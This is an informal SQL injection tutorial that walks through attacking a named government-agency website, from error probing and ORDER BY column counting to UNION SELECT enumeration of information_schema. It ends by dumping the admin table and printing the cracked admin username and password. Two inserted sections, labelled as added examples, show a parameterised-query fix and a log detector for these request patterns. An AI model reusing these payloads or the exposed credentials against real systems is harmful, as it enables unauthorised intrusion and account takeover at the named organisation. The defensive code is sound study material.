Hello, today I will show you how easy SQLi can be :)
Introduction:
What is SQLi (SQL injection)?
SQL injection is one of the basics of web hacking, and it is the first technique most people start with when exploiting sites.
How to find SQLi-vulnerable sites and inject them:
This is very simple: use dorks with an SQLi scanner, or with Google, and then check every site yourself.
To check manually whether a site is vulnerable to SQLi, just add ' at the end of the URL.
For example, we have our target:
http://www.cocobod.gh/news_details.php?id=30
Now we want to check whether it is vulnerable to SQLi, so we add ' at the end:
http://www.cocobod.gh/news_details.php?id=30'
If we get an error, that means it is vulnerable :)
So now we move on to the next step.
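Why the added quote produces an error, and what removes it, shown as an added example that is not part of the original post. SQLite stands in for the MySQL backend, and the schema, rows and function names are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed schema and rows; SQLite stands in for the page's MySQL backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
    db.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    db.execute("INSERT INTO news VALUES (30, 'Constructed headline', 'Constructed body')")
    db.execute("INSERT INTO admin VALUES ('demo_admin', 'constructed-hash')")
    return db

def lookup_concatenated(db, raw_id):
    # Vulnerable pattern: the request parameter is pasted into the SQL text,
    # so a stray quote breaks the statement and appended SQL is executed.
    return db.execute(
        "SELECT id, title, body FROM news WHERE id = " + raw_id).fetchall()

def lookup_bound(db, raw_id):
    # Hardened pattern: reject non-numeric ids, then bind the value as data.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    return db.execute(
        "SELECT id, title, body FROM news WHERE id = ?", (int(raw_id),)).fetchall()

def probe(lookup, raw_id):
    # Returns ("error", message) if the database rejects the statement,
    # otherwise ("rows", result). Error text should never reach the client.
    try:
        return ("rows", lookup(make_db(), raw_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    for raw_id in ("30", "30'", "30 union select 1, username, password from admin--"):
        print(repr(raw_id), probe(lookup_concatenated, raw_id), probe(lookup_bound, raw_id))
```

With the bound query, the quote and the UNION payload are both handled as a non-matching id, so there is no error to observe and no second result set.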
How to find the column count:
Once you have your vulnerable site, you need to know its column count. To do that, add "order by X--" at the end of the URL, where X is a number starting from 1.
For example, we have our target server and we try to count its columns: we add order by 1-- at the end, then order by 2--, etc., always increasing the number until the website returns an error.
So, on our target server, we tried this:
http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column
That means that the 8th column does not exist, so the column count is 7 :D
How to find the accessible columns:
Now we know that the column count is 7. The next step is to check for accessible columns. To do that, we use the query "UNION SELECT number,of,columns--", like this:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--
That means that we can get information from the site through the 6th, the 2nd, and the 3rd columns :D We have the used columns.
How to get the MySQL DB version:
We need to know the MySQL DB version to know whether we can exploit this site or not, because you can't work on a site that is using MySQL 4.x.x, but every 5.x.x or above is exploitable :) (The steps below read information_schema, which MySQL 4 does not have.)
To find the MySQL DB version, just replace the number of the used column with "@@version", for example:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--
That means that we can continue working on this site.
How to find the database name:
Now we are going to inject the site to learn the DB name.
To do this, replace the used column number with "group_concat(schema_name)" and add "from information_schema.schemata--" after the last column number, for example:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--
Now, to get the one the website uses, replace "group_concat(schema_name)" with "concat(database())", for example:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--
Congrats, you have the used DB :D
How to get the table names:
Now we need to get the table names. To do this, replace the used column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()--" after the last column number.
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--
How to get the column names:
To get the column names, we will use these queries:
group_concat(column_name)
from information_schema.columns where table_schema=database()--
Example:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--
How to get information from the columns:
Now we are at our final step: getting the admin info from the columns. How do we do it?
Simple, follow this example:
http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columnusername,0x3a,columnpassword),7 from currentdb.tableused--
So our exploit will look like this:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--
Now we need to recover the password, which is stored as an MD5 hash.
Go to http://www.md5decrypter.co.uk/, paste your hash, fill in the captcha and click on decrypt. With a little luck, you will get the password, like here :)
comaster:2c39e3769d300f7e23f8a9e1e21773e7
comaster:cocoadmin4682
username : comaster
password : cocoadmin4682
We have successfully injected a website and got the admin info.
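From the defender's side, each step of this walkthrough leaves a recognisable request in the web server's access log. The following added example (not part of the original post) flags clients that progress through several of those steps; the log lines, IP addresses, rule names and the /search.php path are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# One rule per step of the walkthrough, applied to the URL-decoded query string.
RULES = [
    ("quote_probe", re.compile(r"=\d+'")),
    ("order_by_enum", re.compile(r"\border\s+by\s+\d+\s*--", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("version_probe", re.compile(r"@@version", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(?:schemata|tables|columns)\b", re.I)),
]
LOG_RX = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" \d{3}')

# Constructed access-log lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = """\
198.51.100.4 - - [01/Jan/2024:10:00:00 +0000] "GET /news_details.php?id=30 HTTP/1.1" 200 5120
198.51.100.4 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=how+to+order+by+phone HTTP/1.1" 200 2048
203.0.113.7 - - [01/Jan/2024:10:01:00 +0000] "GET /news_details.php?id=30%27 HTTP/1.1" 500 310
203.0.113.7 - - [01/Jan/2024:10:01:09 +0000] "GET /news_details.php?id=30%20order%20by%208-- HTTP/1.1" 500 310
203.0.113.7 - - [01/Jan/2024:10:02:30 +0000] "GET /news_details.php?id=30+union+select+1,2,3,4,5,@@version,7-- HTTP/1.1" 200 5130
203.0.113.7 - - [01/Jan/2024:10:03:12 +0000] "GET /news_details.php?id=30+union+select+1,2,3,4,5,group_concat(table_name),7+from+information_schema.tables-- HTTP/1.1" 200 5400
"""

def classify(request_target):
    """Names of the rules that match the decoded query string of one request."""
    query = unquote_plus(urlsplit(request_target).query)
    return [name for name, rx in RULES if rx.search(query)]

def scan(lines, min_stages=2):
    """Map client IP -> ordered distinct stages, keeping clients with >= min_stages."""
    seen = {}
    for line in lines:
        m = LOG_RX.match(line)
        if not m:
            continue
        ip, target = m.groups()
        for name in classify(target):
            if name not in seen.setdefault(ip, []):
                seen[ip].append(name)
    return {ip: stages for ip, stages in seen.items() if len(stages) >= min_stages}

if __name__ == "__main__":
    for ip, stages in scan(SAMPLE_LOG.splitlines()).items():
        print(ip, "->", ", ".join(stages))
```

Requiring two or more distinct stages per client keeps a single stray quote or a search for the words "order by" from raising an alert on its own.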






